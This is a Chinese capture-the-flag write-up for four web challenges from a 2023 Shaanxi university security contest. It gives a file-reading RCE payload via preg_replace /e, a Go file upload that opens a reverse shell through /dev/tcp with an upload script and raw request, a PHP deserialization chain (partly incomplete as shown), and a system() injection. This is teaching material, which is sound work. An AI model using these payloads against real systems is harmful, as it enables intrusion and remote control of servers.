WriteUp - 2023陕西省大学生网络安全技能大赛

WEB

0x01 Web – ezrce

题目

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>钥匙呢?</title>
</head>
<body>
<!--
   admin的钥匙被他的机器人抢走了！ 
-->
<form action="" method="post" name="name">
    you name：<input name="name" type="text" value="" />
    <input type="submit" value="submit" />
    <br/>
</form>
<form action="" method="get" name="key">
    your key：<input name="key" type="text" value="" />
    <input type="submit" value="submit" />
    <br/>
</form>



<?php
error_reporting(0);
include 'waf.php';
header("Content-Type:text/html;charset=utf-8");
echo "你是谁啊哥们？把钥匙给我！！！！<br/>";
$key=$_GET['key'];
$name=$_POST['name'];
$qaq=waf($_POST['qaq']);
if (isset($_GET['key'])){
  highlight_file(__FILE__);
}
if (isset($name))
{
    echo "你是".$name."大人????<br/>";
    $name1=preg_replace('/hahaha/e',$qaq,$name);
    echo "骗我的吧，你明明是    >>>>小小".$name1;
}
?>

主要利用点在这 $name1=preg_replace('/hahaha/e',$qaq,$name);

要求post参数qaq和name，get参数key

主要参考文章：https://www.freebuf.com/articles/system/242482.html

文章里讲得很详细了，array_rand()实现随机读取文件

1. first payload: name=hahaha&qaq=readfile(array_rand(array_flip(scandir(getcwd()))));

成功读到waf.php的内容

|\/|\?|\\\\/i", $poc)){ echo "hacker! you die!
"; return "666"; } return $poc; } 骗我的吧，你明明是 >>>>小小300 

在原payload基础上修改，
利用三个dirname()返回到根目录，array_rand()实现随机读取

2. final payload ：
   name=hahaha&qaq=readfile(array_rand(array_flip(scandir(dirname(chdir(dirname(dirname(dirname(getcwd())))))))))

随机读取，多点几次就出来了

0x02 WEB - test

查看页面源代码，发现/profile/index这个路由，访问一下返回一个result，试试/profile/admin，返回一个MD5，解密得asdfgh123 ， admin登录进去，提示上传个go文件，就会运行，构造一个上传数据包，go文件如下:

package main

import (
  "fmt"
  "log"
  "os/exec"
)

func main() {
  cmd := exec.Command("/bin/bash", "-c", "bash -i &> /dev/tcp/ip/port 0>&1")
  out, err := cmd.CombinedOutput()
  if err != nil {
    fmt.Printf("combined out:\n%s\n", string(out))
    log.Fatalf("cmd.Run() failed with %s\n", err)
  }
  fmt.Printf("combined out:\n%s\n", string(out))
}

上传脚本如下：

import requests

url = 'http://1a059500.clsadp.com/Adm1nUp104d'
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36',
    'Referer': 'http://1a059500.clsadp.com/'
}
file_path = r'file.go'

with open(file_path, 'rb') as file:
    file_data = file.read()
data = {
    'file': ('123.go', file_data, 'application/octet-stream'),
    'submit': 'submit_file'
}

response = requests.post(url, headers=headers, files=data)

print(response.text)

上传文件请求包如下：

POST /Adm1nUp104d HTTP/1.1
Host: 8e50756d.clsadp.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://8e50756d.clsadp.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundarydX4dGEAJZUS6ZqkT
Content-Disposition: form-data; name="file"; filename="123.go"
Content-Type: application/octet-stream

package main

import (
  "fmt"
  "log"
  "os/exec"
)

func main() {
  cmd := exec.Command("/bin/bash", "-c", "bash -i &> /dev/tcp/ip/port 0>&1")
  out, err := cmd.CombinedOutput()
  if err != nil {
    fmt.Printf("combined out:\n%s\n", string(out))
    log.Fatalf("cmd.Run() failed with %s\n", err)
  }
  fmt.Printf("combined out:\n%s\n", string(out))
}
------WebKitFormBoundarydX4dGEAJZUS6ZqkT
Content-Disposition: form-data; name="submit"

submit_file
------WebKitFormBoundarydX4dGEAJZUS6ZqkT--

0x03 WEB-pop

EXP如下：

<?php
highlight_file(__FILE__);
error_reporting(E_ALL);
ini_set('display_errors', 1);
class night
{
    public $night;


}

class day
{
    public $day;


}


class light
{
    public $light;

}

class dark
{
    public $dark;

}




$a = new night();
$a -> night = new day();
$a -> night -> day = new dark();
$a -> night -> day -> dark = new light();
$a -> night -> day -> dark -> light = new day();
$a -> night -> day -> dark -> light -> day = new dark();
$a -> night -> day -> dark -> light -> day -> dark = 'ls';
unset($a);

echo urlencode(serialize($a))."\n";
$un = '‮⁦快给我传参⁩⁦pop';
echo urlencode($un);

?>

0x04 WEB - unserialize

直接传参?a=system(“ls /”)